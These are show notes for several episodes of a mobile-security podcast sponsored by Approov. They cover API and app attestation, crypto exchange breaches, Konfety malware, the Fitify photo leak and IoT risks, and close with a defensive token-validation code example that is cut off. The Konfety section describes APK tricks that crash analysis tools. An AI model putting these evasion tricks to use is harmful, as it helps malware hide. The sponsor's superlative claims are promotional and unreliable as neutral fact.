• Engineering & Development Teams: These teams are directly responsible for "building secure code for both the mobile app and the backend". They must implement "secure development practices" and are critically concerned with "improper handling of secrets" like API keys, which are often hardcoded and easily extracted.
• Marketing & Brand Management Teams: A breach of sensitive user data due to API or mobile app vulnerabilities would "severely damage the brand's reputation and trust", directly impacting efforts to attract and retain users.

The Flaws in Traditional Mobile Security:
• Obfuscation is Not Enough: While code obfuscation aims to deter reverse engineering and IP theft, it is a "thin veil, not an impenetrable shield". It offers "minimal protection against threats that manifest during runtime" and is "ineffective secret protection" as secrets must eventually be in cleartext memory. It can also create a "false sense of security" and is increasingly vulnerable to "modern tools and AI" which can automate deobfuscation.
• APIs are the True Target: Attackers are increasingly bypassing the mobile app itself and "targeting the backend APIs directly". APIs provide a "direct pathway to backend application logic and sensitive data stores", making them prime targets for "credential stuffing, account takeover (ATO), scraping, and business logic abuse". Recent incidents involving e-hailing and delivery apps, Experian, and John Deere highlight common flaws like Broken Object Level Authorization (BOLA) (https://approov.io/blog/what-you-need-to-know-about-broken-object-level-authorization-bola) and insecure access controls that exposed vast amounts of PII and operational data.

The Solution: Embracing Dynamic, Zero Trust Runtime Protection: To address modern threats, a decisive shift from static, pre-deployment security to a "dynamic, runtime-centric model rooted in Zero Trust principles" is essential. This approach entails:
• Zero Trust Architecture: This model mandates "never trust, always verify", requiring continuous, runtime verification of devices, users, and networks for access to critical resources. It emphasizes that "trust is never implicit" and acknowledges that traditional static checks and one-time authentication are insufficient. Zero Trust requires "external, cryptographically verifiable measurements that originate outside the app and cannot be forged or intercepted" to avoid a "circular trust problem".
• Key Dynamic Defenses:
    ◦ Runtime Application Self-Protection (RASP) (https://approov.io/mobile-app-security/rasp/): Acts as the app's "internal bodyguard", detecting and preventing real-time attacks from within the application. It identifies threats like reverse engineering attempts, code tampering, execution on compromised environments (root/jailbreak), and the presence of hooking frameworks. RASP provides "real-time protection" and "zero-day potential" by detecting anomalous behaviour.
    ◦ App Attestation (https://approov.io/mobile-app-security/rasp/app-attestation/): This crucial process verifies the "authenticity and integrity of the mobile application instance and its runtime environment" before granting API access. It ensures that only "genuine, untampered app instances" running in a safe environment can interact with APIs, effectively solving the "'What' vs. 'Who' Problem" (validating the client app in addition to the user). This blocks automated bots, scripts, and tampered apps.
    ◦ Runtime Secrets (https://approov.io/mobile-app-security/rasp/runtime-secrets/): This robust solution eliminates the need to hardcode sensitive credentials like API keys directly into the app. Instead, secrets are stored securely in a backend service and delivered "just-in-time" to the validated app instance only after passing rigorous app attestation checks. This protects against both static and dynamic extraction of secrets.
    ◦ Dynamic Channel Protection (Dynamic Pinning): Overcomes the brittleness of traditional static certificate pinning. This approach securely retrieves the current, valid set of pins dynamically over the air from a trusted management service (after attestation). This ensures "robust MitM Protection" against Man-in-the-Middle attacks while offering "flexibility and maintainability" for certificate rotations without requiring app updates.
• Defense in Depth: An "optimal mobile security strategy employs a defense-in-depth approach, leveraging both static and dynamic techniques". While static analysis and obfuscation can still identify coding errors early, they must be "complemented by robust dynamic and runtime defenses". For applications handling sensitive data or critical functions, dynamic security measures are "fundamental requirements for achieving adequate resilience against modern threats".

Empowering Your Mobile-to-Cloud Connection with Approov: Solutions like Approov Mobile Security play a vital role in securing the communication channel between your genuine mobile app and the cloud backend.
Approov provides a "unique, patented runtime shielding solution" that focuses on:• Mobile App Attestation: Verifying the integrity of the running mobile app to ensure it's genuine and untampered, preventing bots and modified apps from accessing APIs.• API Request Verification: Cryptographically binding API requests to an attested app instance, ensuring only legitimate requests are processed.• Runtime Secrets Protection: Eliminating hardcoded API keys by securely delivering short-lived tokens to attested apps on demand.• Dynamic Pinning: Providing secure, over-the-air updates for certificate pins, ensuring tamper-proof communication between the app and API. Approov enables "https://approov.io/knowledge/ota-updates-are-essential-for-securing-mobile-apps" for security policies, pin configurations, and attestation logic, allowing instant responses to new threats without requiring app releases. It offers analytics and reporting for monitoring, auditing, and compliance.By adopting a comprehensive AppSec strategy that includes strong cloud security practices and innovative solutions, organisations can significantly reduce their attack surface and protect their users and valuable data.Don't leave your back door open – and ensure only trusted visitors can reach your front door!--------------------------------------------------------------------------------Sponsored by: Approov Visithttps://approov.io to learn how Approov can safeguard your mobile apps and APIs with advanced runtime protection, app attestation, and secure secrets management.--------------------------------------------------------------------------------Keywords: Mobile App Security, API Security, Cloud Security, AppSec, Zero Trust, RASP, App Attestation, Runtime Secrets Protection, Dynamic Pinning, Code Obfuscation, Data Breach, PII, Cyber Security, Digital Transformation, Enter🎙️ Upwardly Mobile is hosted by Skye & George. 
🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

  46. 77

    Crypto Under Siege: $2.5 Billion Lost in H1 2025 and the Battle for Web3 Security

    Crypto Under Siege: Billions Lost in H1 2025 and the Battle for Web3 Security

    **Episode Description:** The first half of 2025 has witnessed an unprecedented surge in cyberattacks against cryptocurrency exchanges, leading to billions of dollars in stolen digital assets [1-3]. In this episode of "Upwardly Mobile," we delve into the alarming statistics from CertiK's latest report and dissect the most significant incidents, including the Coinbase data breach and the Bybit hack [1, 2, 4]. Discover the evolving tactics employed by sophisticated attackers—from insider threats and social engineering to supply chain attacks and wallet compromises—and explore the critical security measures and technologies platforms are implementing to safeguard user funds and rebuild trust in the volatile Web3 landscape [5-11].

    Key Takeaways:
    • Record-Breaking Losses in H1 2025: Approximately $2.47 billion in cryptocurrency was stolen through hacks, scams, and exploits in the first half of 2025, already surpassing the total amount lost in all of 2024 [1-3]. According to CertiK, when accounting for confirmed, unrecovered losses, the net figure stands at $2.29 billion, exceeding last year's adjusted total of $1.98 billion [3].
    • Major Incidents Driving Losses: Two significant events accounted for nearly $1.78 billion of the total losses in H1 2025 [3]:
        ◦ Bybit Breach (February 2025): Hackers stole an estimated $1.4 billion from the Dubai-based exchange in an attack linked to Lazarus, a state-sponsored North Korean APT group [1]. This incident largely contributed to wallet compromise being the costliest attack vector [6].
        ◦ Cetus Protocol Incident: This decentralized exchange (DEX) on Sui lost $225 million due to hackers using spoofed tokens and price manipulation [6].
    • Coinbase Under Attack:
        ◦ May 2025 Data Breach (Insider Threat/Social Engineering): Hackers bribed and coerced a small group of overseas customer support agents to steal sensitive customer data, including names, dates of birth, partial Social Security numbers, masked bank account numbers, addresses, phone numbers, and emails [4]. While no login credentials or private keys were obtained, this data was used for social engineering attacks [4]. Coinbase refused a $20 million extortion attempt and instead established a $20 million reward fund for information leading to the attackers' arrest [12]. The estimated financial impact for Coinbase is between $180 million and $400 million, including voluntary customer reimbursements for funds lost to social engineering [12]. This incident highlighted the critical risk of insider threats and the need for enhanced real-time endpoint security and data loss prevention (DLP) [5, 7].
        ◦ March 2025 GitHub Action Supply Chain Attack: Coinbase was an initial target of a supply chain attack on GitHub Action, exploiting a public continuous integration/continuous delivery flow [5]. Coinbase successfully detected and mitigated this issue [5].
    • Evolving Attack Vectors:
        ◦ Social Engineering and Phishing: These tactics remain highly lucrative, with scammers evolving methods to trick victims into revealing sensitive information or transferring funds [6, 13]. Phishing was the most costly attack vector in Q2 2025, with over $395 million lost, surpassing previous periods [14].
        ◦ Wallet Compromise: This has been the costliest attack vector overall in H1 2025 due to major incidents like the Bybit hack [6].
        ◦ Infrastructure-Level Breaches: More than 80% of stolen funds in 2025 have resulted from breaches where hackers gain significant access to core infrastructure [7].
        ◦ Targeting Employees/Contractors: The Coinbase incident specifically illustrates a growing trend of cybercriminals bribing or coercing individuals with legitimate system access [7].
        ◦ Supply Chain Attacks: Exploiting vulnerabilities in third-party tools or service providers, often through weak APIs or compromised software updates [10].
        ◦ Malware Attacks: Including Advanced Persistent Threats (APTs) and keylogging for credential theft [15].
    • Strengthening Defenses: Crypto exchanges are implementing comprehensive security frameworks and multi-layered approaches to build resilience [11]:
        ◦ Advanced Wallet Technologies: Utilizing Multi-Party Computation (MPC) Wallets to eliminate single points of failure by never reconstructing private keys in full [9, 16], alongside robust hot-warm-cold storage architectures [16].
        ◦ Enhanced Security Protocols: Implementing Multi-Factor Authentication (MFA), biometric verification, and real-time transaction notifications [8].
        ◦ Strong Governance Policies: Multi-approval policies for high-risk actions [8].
        ◦ Insider Threat Detection: Robust detection and prevention systems are crucial [7].
        ◦ Continuous Monitoring: Real-time monitoring of API activity and system updates [10].
        ◦ Compliance: Adherence to international security standards like SOC 2 and ISO 27001 provides built-in compliance assurance [17].

    Relevant Links to Source Materials:
    • Excerpts from "Crypto Losses Surpass $2.47 Billion in H1 2025, CertiK Report Reveals Alarming Rise in Phishing Attacks"
    • Excerpts from "How Crypto Exchanges Get Hacked: Understanding the Growing Threat Landscape"

    **Sponsor Message:** This episode of Upwardly Mobile is brought to you by Approov. In a world where mobile apps are crucial for engaging customers and employees, Approov provides advanced mobile app protection against reverse engineering, tampering, and automation. Secure your APIs and protect your critical data with Approov. (Note: The information regarding Approov.io is not from the provided sources and should be independently verified.) Learn more at approov.io.

    **Keywords:** Cryptocurrency, Crypto exchange hacks, Cyberattacks 2025, Web3 security, Coinbase hack, Bybit breach, CertiK report, Social engineering, Insider threat, Supply chain attack, Crypto losses H1 2025, Digital asset security, Blockchain security, Phishing attacks, Wallet compromise, MPC wallets, Data breach, Cybersecurity for crypto, Decentralized finance, DeFi.

  47. 76

    Unmasking Konfety: How Remote App Attestation Defeats Evil Twin Malware

    In this episode of Upwardly Mobile, we delve deep into the sophisticated world of Konfety malware and explore how remote app attestation provides a crucial defence against its cunning tactics.

    Konfety employs an "evil twin" method, creating malicious versions of legitimate apps that share the same package name and publisher IDs as benign "decoy twin" apps found on official app stores. This allows the malware to spoof legitimate traffic for ad fraud and other malicious activities. Konfety's "evil twins" are distributed through third-party sources, malvertising, and malicious downloads, effectively bypassing official app store security checks.

    To evade detection, Konfety employs sophisticated obfuscation and evasion techniques. These include dynamic code loading, where malicious code is decrypted and executed at runtime from an encrypted asset bundled within the APK. It also manipulates APK structures through tactics like enabling the General Purpose Flag bit 00 (which can cause some tools to incorrectly identify the ZIP as encrypted and request a password) and declaring unsupported compression methods (such as BZIP) in the AndroidManifest.xml (which can result in partial decompression or cause analysis tools like APKTool or JADX to crash). Other stealth techniques involve suppressing app icons, mimicking legitimate app metadata, and applying geofencing to adjust its behaviour by region. The malware leverages the CaramelAds SDK to fetch ads, deliver payloads, and maintain communication with attacker-controlled servers. Users may experience redirects to malicious websites, unwanted app installs, and persistent spam-like browser notifications. The threat actors behind Konfety are highly adaptable, consistently altering their targeted ad networks and updating their methods to evade detection.

    So, how does remote app attestation combat such a resilient threat? Remote app attestation is a security mechanism where a mobile app proves its identity and integrity to a trusted remote server. This process typically involves the mobile app generating a unique "fingerprint" or "evidence" of its current state, often using hardware-backed security features like Trusted Execution Environments or Secure Enclaves. This evidence includes measurements of the app's code, data, and the device's security posture (e.g., whether the bootloader is locked, if the device is rooted, or if it's running an official OS). This evidence is then sent to a trusted remote server, often an attestation service, for verification. The attestation service compares the received evidence against a known good baseline or policy, checking if the app is genuine and unmodified, if the code running is the expected untampered version, and if the device it's running on is secure and hasn't been compromised. Based on this verification, the server provides a "verdict," which determines whether the app is allowed to proceed with sensitive operations (like accessing premium content or making transactions).

    Remote app attestation provides specific protections against Konfety by:
    • Detecting "Evil Twins": Even if the "evil twin" spoofs a package name, its underlying code and environment measurements would likely differ from the legitimate app. The attestation service would detect this mismatch, as the "fingerprint" wouldn't match the expected genuine app.
    • Preventing Tampering: Konfety's manipulation of APK structures and dynamic code loading aims to hide malicious activity. Remote attestation, particularly if it includes code integrity checks and runtime environment monitoring, would detect these unauthorized modifications or the execution of unapproved code.
    • Identifying Compromised Devices: If Konfety relies on a rooted or otherwise compromised device to operate, remote app attestation can identify these device security issues, allowing the backend to deny service to that device.
    • Backend Control: A key benefit is that the decision of trust is made on a secure backend, not on the potentially compromised mobile device itself. This makes it much harder for Konfety to spoof or interfere with the attestation process.

    Organisations like Zimperium offer on-device Mobile Threat Defence (MTD) solutions and zDefend, which are noted to protect customers against Konfety malware's new evasion techniques. HUMAN's Satori Threat Intelligence Team originally uncovered the Konfety operation in 2024, and their Human Defense Platform is stated to protect customers from its impacts.

    While remote app attestation isn't a silver bullet against all malware, it provides a strong defence against the specific techniques used by Konfety by verifying the authenticity and integrity of the app and its environment before allowing it to interact with critical backend services. Please note that the source materials were provided as excerpts, and direct hyperlinks to the full articles are not available.

    Keywords: Konfety malware, evil twin apps, mobile app security, remote app attestation, ad fraud, Android malware, obfuscation, dynamic code loading, APK manipulation, CaramelAds SDK, cyber security, mobile threats, Zimperium, HUMAN Security, app integrity, device compromise, malvertising, fraud detection, mobile security solutions, threat intelligence.

  48. 75

    The Fitify Fiasco: Unpacking 300K Photos Exposed via Hardcoded App Secrets!

    The Fitify Fiasco: Unpacking 138K Private Progress Photos, 206K Profile Photos & Hardcoded App Secrets

    Welcome to Upwardly Mobile! In today's episode, we dive deep into the recent massive data leak involving the popular iOS fitness app, Fitify, affecting over 25 million users globally. We'll explore the critical security vulnerabilities exposed and discuss how adherence to standards like OWASP MASVS and advanced solutions like Approov can protect your mobile apps and user data.

    The Fitify Fiasco: The Cybernews research team recently uncovered a significant data breach with Fitify, a widely used iOS fitness app. Their investigation revealed that 373,000 sensitive user files, including a staggering 138,000 progress photos, were stored in a publicly accessible Google Cloud bucket. Critically, these files lacked password protection or encryption at rest, meaning anyone could access them. Many of these exposed "progress pictures" and "body scans" were taken with minimal clothing to better showcase body changes, making the exposure highly sensitive for users tracking weight loss or muscle growth. Other leaked data included 206,000 user profile photos, 13,000 AI coach message attachments (which may include images or text), and 6,000 body scan files, including photos and AI-generated metadata (e.g., lean mass, body fat, posture). The leak was discovered on May 7th, 2025, and after Cybernews contacted the company, Fitify Workouts s.r.o. closed the unprotected instance on June 9th, 2025.

    Security Gaps Highlighted: Despite Fitify's Google App Store description clearly stating that "data is encrypted in transit", Cybernews found a severe lack of basic access controls, which poses serious privacy risks. The fact that user data could be accessed without any passwords or keys demonstrated that it was not encrypted at rest. Furthermore, researchers discovered hardcoded secrets embedded directly within the app's code. These included Google API and Client IDs, Firebase database URLs, Facebook tokens (such as Facebook App ID and Client Token), and even an Algolia API key, which was notably not disclosed in Fitify's privacy policy. These exposed credentials could potentially enable attackers to access backend infrastructure, impersonate users, or inject malicious content. This issue is not isolated; Cybernews's broader research found that 71% of 156,000 iOS apps analyzed leak at least one secret, with an average of 5.2 secrets per app.

    Understanding Mobile App Security with OWASP MASVS: This incident underscores the importance of adhering to robust mobile application security standards like the OWASP Mobile Application Security Verification Standard (MASVS). MASVS serves as an industry standard and a comprehensive framework for mobile software architects, developers, and security testers to ensure the development of secure mobile applications. It categorizes security controls into various groups:
    MASVS-STORAGE: Addresses the secure storage of sensitive data on a device (data-at-rest), a critical area directly violated by the Fitify leak.
    MASVS-NETWORK: Focuses on secure network communication between the mobile app and remote endpoints (data-in-transit). While Fitify claimed encryption in transit, the publicly accessible bucket points to fundamental network security misconfigurations in data storage.
    MASVS-CODE: Covers security best practices for data processing and keeping the app up-to-date, directly related to the problem of hardcoded secrets and securing credentials.
    MASVS-PRIVACY: Aims to protect user privacy, which was severely compromised in this breach due to the sensitive nature of the leaked progress photos.
    The OWASP Mobile Top 10 risks also highlight prevalent issues in mobile app security, such as static reverse engineering (ranked 9th) and code tampering (ranked 8th), which are common techniques used by attackers to uncover hardcoded secrets and manipulate app behavior.

    Shielding Your App: Solutions with Approov: The Fitify leak demonstrates the critical need for advanced mobile app and API protection beyond basic security measures. Approov offers a runtime shielding solution that effectively protects mobile apps, their APIs, and the communication channel between them from automated attacks. Approov works by using a cryptographically signed "Approov token" to allow the app to provide proof of its authenticity, ensuring that only a genuine, untampered mobile app running in an uncompromised environment can access your APIs. Key Approov capabilities relevant to preventing such leaks and attacks include:
    Runtime Secrets Protection: This feature allows hardcoded API keys and other sensitive secrets to be removed directly from the app's code and instead securely managed in the Approov cloud. These secrets are only delivered to verified, legitimate app instances at runtime. This directly addresses the hardcoded secrets vulnerability found in Fitify.
    MASVS-R Resilience against Reverse Engineering and Tampering: Approov significantly enhances an app's resilience. It integrates diverse detection mechanisms to identify and respond to threats such as rooted or jailbroken devices, attached debuggers, app tampering, the presence of widely used reverse engineering tools (e.g., Frida), and apps running in emulators or cloners.
    MASVS-L2 SSL Pinning: Approov provides dynamic certificate pinning as a defense-in-depth measure to secure TLS connections. This helps prevent Man-in-the-Middle (MitM) attacks by ensuring the app only communicates with trusted backend endpoints. A powerful aspect is that these pins can be updated over-the-air without requiring a new app release, simplifying DevOps processes.
    By blocking illegitimate requests, Approov prevents the exploitation of stolen user credentials, known or "zero-day" vulnerabilities, malicious business logic manipulation, and large-scale MitM attacks.

    Actionable Takeaways: This incident serves as a stark reminder for both developers and users. Developers must prioritize secure coding practices, implement robust access controls and encryption for all data storage (at rest and in transit), and avoid hardcoding sensitive information. For users, it highlights the critical importance of scrutinizing privacy policies, understanding what data is collected and how it's stored, and being cautious about sharing sensitive personal information through mobile applications.

    Relevant Links:
    Fitify Privacy Policy: https://gofitify.com/privacy-policy
    Apple World Today report: "Cybernews claims iOS Fitify app has a massive data leak"
    Cybernews report: "Fitify app exposes 138K user progress photos"
    OWASP Mobile Security Project: For more on mobile app security standards and testing guides

    Sponsor: Approov Mobile Security: Learn how to protect your apps and APIs from sophisticated attacks at approov.io

    Keywords: Fitify, Data Leak, Mobile App Security, iOS, Fitness App, Privacy, PII, Personal Data, Google Cloud, Hardcoded Secrets, API Security, OWASP, MASVS, Approov, Runtime Shielding, SSL Pinning, Authentication, Authorization, Reverse Engineering, Tampering, Jailbreak, Rooting, Man-in-the-Middle (MitM), Zero-Day Vulnerabilities, Cybernews, Data Breach Prevention, Digital Health, App Vulnerabilities, Mobile Privacy, Cyber Attack.

  49. 74

    The $7M Blindspot: Mobile App Security's Hidden Costs and Fortifying APIs with Zero Trust

    In this episode of Upwardly Mobile, we dive deep into the critical, yet often underestimated, world of mobile app security. Drawing on recent research, we uncover a staggering misalignment between perception and reality, highlighting why organizations are facing an average of nine mobile app security incidents per year, with an average financial toll reaching $6.99 million in 2025.

    While 93% of organizations believe their mobile app protections are sufficient, a substantial 62% have experienced at least one security incident in the past year. The repercussions extend beyond financial losses, including application downtime, sensitive data leaks, erosion of consumer trust, and a diminished user experience.

    We explore why traditional security measures, particularly code obfuscation, are no longer enough. Obfuscation, while deterring casual attackers, is ultimately a deterrent, not a preventative measure, offering minimal protection against runtime threats, dynamic analysis, and AI-assisted reverse engineering.

    The real target for modern attackers is increasingly Application Programming Interfaces (APIs). Mobile apps serve as entry points to exploit backend APIs for credential stuffing, data scraping, and business logic abuse, none of which static defenses can prevent. The weaponization of Artificial Intelligence (AI) further escalates these threats, enabling automated botnets, adaptive malware, and accelerated vulnerability discovery.

    The solution? A crucial shift towards a dynamic, runtime-centric security model rooted in Zero Trust principles. This approach demands continuous monitoring and verification, moving beyond static, pre-deployment checks to protect apps during execution. Key elements of this essential dynamic security strategy include:
    • Mobile Runtime Application Self-Protection (RASP): Acting as the app's internal bodyguard, RASP detects and responds to runtime threats like debuggers, tampering, root/jailbreak, and hooking frameworks, offering real-time protection and contextual awareness.
    • App Attestation & API Request Validation: This is a standout feature, ensuring that only requests truly originating from your official, unmodified mobile app, running on a non-compromised device, are allowed to access your backend APIs. This effectively blocks bots, scripts, and tampered apps, and mitigates API abuse.
    • Runtime Secrets Protection: This critical measure removes sensitive secrets (like API keys) from the app's code entirely. Instead, secrets are delivered securely at runtime, just-in-time, and only to attested apps, preventing extraction through reverse engineering.
    • Dynamic Channel Protection (Dynamic Pinning): Unlike brittle static certificate pinning, dynamic pinning allows for secure, over-the-air updates of certificate pins, ensuring continuous protection against Man-in-the-Middle (MitM) attacks without requiring app store updates.

    We also differentiate between leading mobile app security solutions:
    • Guardsquare, with products like DexGuard and iXGuard, excels in client-side mobile app protection, focusing on code obfuscation, hardening, and RASP to make the app's code incredibly difficult to compromise on the device.
    • Approov emphasizes remote mobile app attestation, performing deep, continuous inspection of the mobile app and device in the cloud. This server-side decision-making makes it significantly harder for attackers to bypass the attestation process, ensuring only genuine apps access your APIs. Approov's positive security model effectively "locks down" backend APIs.

    Ideally, a comprehensive mobile app security strategy leverages both types of solutions: Guardsquare for strong in-app protection, and Approov for critical API integrity and abuse prevention. This multi-layered approach, combining static and dynamic defenses, is no longer optional but a fundamental requirement for achieving adequate resilience against modern mobile threats.

    Relevant Links to Source Materials:
    • Learn more about the research highlighting the mobile app security blindspot: "Research exposes $7M mobile app security blindspot fueled by overconfidence"
    • Explore in-depth the need for dynamic defenses: "WP- Mobile Security Beyond Obfuscation v1.0 FINAL B.pdf"
    • Discover Approov's approach to superior mobile API protection: "Approov: Superior Mobile API Protection via Remote Attestation"

    Sponsor: This episode is brought to you by Approov. Safeguard your mobile apps and APIs with their unique, patented runtime shielding solution. Visit approov.io to learn more.

  50. 73

    Smart Home Security: Navigating IoT Risks with Advanced Mobile App Protection

    In this episode, we dive deep into the pressing concerns of Internet of Things (IoT) security, especially within our increasingly connected smart homes. From smart refrigerators to water shut-off valves, these devices offer immense convenience but also present tempting targets for cybercriminals. We'll explore the array of vulnerabilities, real-world attack statistics, and the innovative solutions emerging to protect our digital and physical spaces.

    Key Discussion Points:

    The Alarming State of IoT Security:
    A shocking 57% of IoT devices are vulnerable to medium- or high-severity attacks, with 70% having serious security vulnerabilities overall.
    A staggering 98% of IoT device traffic is unencrypted, and 43% of manufacturers don't even encrypt data during transmission, leaving sensitive information exposed. This is often due to cost-saving measures or limited processing power in basic device chips.
    The volume of threats is immense, with 1.5 billion IoT attacks detected in just the first half of 2021. Devices can be targeted within 5 minutes of connecting to the internet, as bots constantly scan for new exploits.
    IoT devices are a prime attack vector, accounting for 41% of attacks on enterprises in 2020 and comprising 33% of infected devices in botnets like Mirai. The infamous Mirai botnet, which shut down major internet services in 2016, infected over 25 million IoT devices by exploiting weak or default credentials, turning common items like printers and baby monitors into attack armies.
    Smart home attacks rose by 600% in a single year, highlighting the escalating risk to everyday gadgets.
    Many organizations face significant challenges, with 72% struggling to discover and classify all IoT devices on their networks, and 67% having limited or no visibility into their IoT environments.
    A critical issue is the widespread use of weak or default passwords, responsible for 91% of IoT data breaches, alongside the concerning fact that 40% of IoT devices no longer receive vendor security updates, leaving them vulnerable.
    Real-world incidents, such as cyberattacks on municipal water infrastructure, serve as a stark warning, demonstrating that compromised water control systems can have severe physical consequences, including interference with water composition or service disruption.

    The Smart Home Ecosystem: A "Toxic Combination" of Apps and APIs:
    Smart homes are controlled through a complex web of mobile apps and APIs, connecting everything from smart ovens to security cameras.
    This creates a "toxic combination": mobile apps can be cloned, tampered with, or run on compromised devices, while APIs can be reverse-engineered and invoked by bots or fake clients. Attackers can easily automate abuse once app-to-API traffic is understood.
    Hackers exploit common issues like lack of app attestation, repackaged or tampered apps, no detection of rooted/jailbroken devices, bypass of obfuscation, API keys hardcoded in the app, and static TLS certificate pins.
    Threats extend beyond simple data breaches to more severe outcomes like device hijacking, Man-in-the-Middle (MitM) attacks, ransomware, and botnet creation, allowing malicious actors to manipulate physical devices or launch large-scale attacks.
    Even smart water shutoff systems like Phyn, Moen Flo, and Flo-Logic, while protecting against water damage, introduce data privacy implications (e.g., detailed water usage patterns revealing intimate household routines) and the risk of unauthorized remote control by malicious actors who could repeatedly toggle the water supply, causing disruption or damage. Moen's privacy statement explicitly notes its business model includes "monetizing data".

    Building a Secure Foundation: Solutions and Best Practices:
    Adapting OAuth2 for IoT: The OAuth2 open authorization standard, popular on the web, is being adapted to help secure access to IoT devices. This involves the authorization grant flow, where a client obtains an access token to delegate access to server resources. Modifications are necessary for constrained IoT environments, such as dynamically securing the channel between a client and resource server (e.g., Alice's phone and a door lock) by using a possession key shared via the authorization server. Another example is a medical device scenario where the authorization server encrypts the possession key into the access token claims using a pre-provisioned key pair.
    Beyond Static Secrets: A more secure approach involves removing static client secrets from mobile apps and leveraging remote attestation services. A dynamic attestation service can verify an app's authenticity at runtime, returning an authenticating, time-limited client integrity token.
    Zero Trust Security Model: Smart home platforms should adopt a Zero Trust security model, which inherently trusts nothing by default. Instead, each and every API request must cryptographically prove it originates from a legitimate, unmodified mobile app at runtime. This involves per-request attestation using short-lived, signed tokens and API-side validation.
    Approov: Enhancing API and App Security: Solutions like Approov Mobile Security play a crucial role by continuously inspecting the app and device to validate the legitimacy of any request from the app, ensuring only authorized apps can access APIs. This not only protects against bots and unauthorized access but also helps reduce cloud costs and allows API owners dynamic control over access policies and certificates without requiring app updates.

    Key Recommendations for Users and Manufacturers:
    Always change default passwords immediately upon setup, using strong, unique combinations.
    Regularly apply firmware and software updates provided by the manufacturer to patch critical security flaws.
    Implement network segmentation, isolating smart home devices on a separate Wi-Fi network (e.g., a guest network or dedicated IoT VLAN) to limit potential lateral movement for attackers if one device is compromised.
    Manufacturers must adopt secure development guidelines from day one, conducting regular penetration testing and prioritizing security throughout the product lifecycle, not as an afterthought.
    Organizations need robust incident response plans and better visibility into their IoT inventories to quickly identify and address threats.
    For critical systems like water shutoff valves, prioritize devices with robust, independent operation (e.g., hardwired connections, substantial battery backups) over those solely reliant on internet connectivity.
    Protect your connected devices and digital life
by understanding these risks and implementing proactive security measures!Relevant Links:IoT Security Challenges: Device Vulnerability & Attack Stats | PatentPC: https://patentpc.com/blog/iot-security-challenges-device-vulnerability-attack-statsPhyn (Example of Smart Water Solution discussed): https://www.phyn.comSecure your mobile apps and APIs with Approov: https://approov.ioKeywords: IoT Security, Smart Home Security, API Security, Mobile App Security, OAuth2, App Attestation, Zero Trust, Mirai Botnet, Data Breaches, Device Hijacking, Network Segmentation, Cybersecurity, Smart Devices, Connected Home, Digital Privacy, Firmware Updates, Password Security, Water Damage Prevention, Phyn, Moen Flo, Flo-Logic, IoT Vulnerabilities, Mobile API Security.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.
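The episode describes two ideas in prose only: an OAuth2-style access token that names a possession key shared via the authorization server, and Zero Trust per-request validation of short-lived, signed tokens on the API side. The following is an added example written for these show notes; it is not code from the podcast, from Approov, or from any OAuth2/ACE library. It assumes a minimal HMAC-signed token format, claim names `app`, `iat`, `exp` and `cnf.kid`, and a constructed scheme in which the resource server re-derives each client's possession key from a secret it shares with the authorization server; all of those are illustrative assumptions, not a standard.

```python
"""Added example (not from the podcast or from Approov): API-side validation of a
short-lived signed token plus a per-request proof of possession.

Assumptions (constructed for illustration): a JWT-like "payload.signature" token
signed with HMAC-SHA256; claims "app", "iat", "exp" and "cnf": {"kid": ...};
the resource server derives the client's possession key as HMAC(RS_KEY, kid),
where RS_KEY is a secret shared with the authorization server.
"""
import base64
import hashlib
import hmac
import json
import os
import time
from typing import Optional, Tuple

# Constructed secrets. ISSUER_KEY signs tokens at the attestation/authorization
# server; RS_KEY is shared between that server and the API so the API can
# re-derive a client's possession key without it ever travelling in a request.
ISSUER_KEY = b"constructed-attestation-signing-key"
RS_KEY = b"constructed-resource-server-key"
EXPECTED_APP = "com.example.smarthome"  # hypothetical app identifier
TOKEN_LIFETIME = 300  # seconds: tokens are short-lived by design


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def possession_key(kid: str) -> bytes:
    """Derive the per-client possession key from its identifier (shared AS/RS secret)."""
    return hmac.new(RS_KEY, kid.encode(), hashlib.sha256).digest()


def issue_token(app_id: str, now: Optional[int] = None) -> Tuple[str, bytes]:
    """Authorization/attestation server side: mint a signed, short-lived token whose
    'cnf' claim names a fresh possession key, and hand that key to the client."""
    now = int(time.time()) if now is None else int(now)
    kid = _b64(os.urandom(16))
    claims = {"app": app_id, "iat": now, "exp": now + TOKEN_LIFETIME, "cnf": {"kid": kid}}
    payload = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = hmac.new(ISSUER_KEY, payload.encode(), hashlib.sha256).digest()
    return payload + "." + _b64(sig), possession_key(kid)


def sign_request(pop_key: bytes, method: str, path: str, body: bytes, ts: int) -> str:
    """Client side: bind this exact request (method, path, time, body hash) to the key."""
    msg = f"{method}\n{path}\n{ts}\n".encode() + hashlib.sha256(body).digest()
    return _b64(hmac.new(pop_key, msg, hashlib.sha256).digest())


def validate_request(token: str, method: str, path: str, body: bytes, ts: int,
                     request_sig: str, now: Optional[int] = None,
                     skew: int = 30) -> Tuple[bool, str]:
    """API side: trust nothing by default. Every request needs a token with a valid
    signature, the expected app claim, an unexpired lifetime, a fresh timestamp,
    and a proof of possession computed with the key the token is bound to."""
    now = int(time.time()) if now is None else int(now)
    try:
        payload, sig = token.split(".")
        expected = hmac.new(ISSUER_KEY, payload.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(sig)):
            return False, "bad token signature"
        claims = json.loads(_unb64(payload))
    except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
        return False, "malformed token"
    if not isinstance(claims, dict):
        return False, "malformed token"
    if claims.get("app") != EXPECTED_APP:
        return False, "token not issued for this app"
    if not (claims.get("iat", 0) - skew <= now < claims.get("exp", 0)):
        return False, "token expired or not yet valid"
    if abs(now - ts) > skew:
        return False, "request timestamp outside window"
    kid = claims.get("cnf", {}).get("kid")
    if not kid:
        return False, "token carries no possession key binding"
    expected_sig = sign_request(possession_key(kid), method, path, body, ts)
    if not hmac.compare_digest(expected_sig, request_sig):
        return False, "proof of possession failed"
    return True, "ok"


if __name__ == "__main__":
    token, key = issue_token(EXPECTED_APP)
    body = b'{"valve": "close"}'  # constructed request body
    ts = int(time.time())
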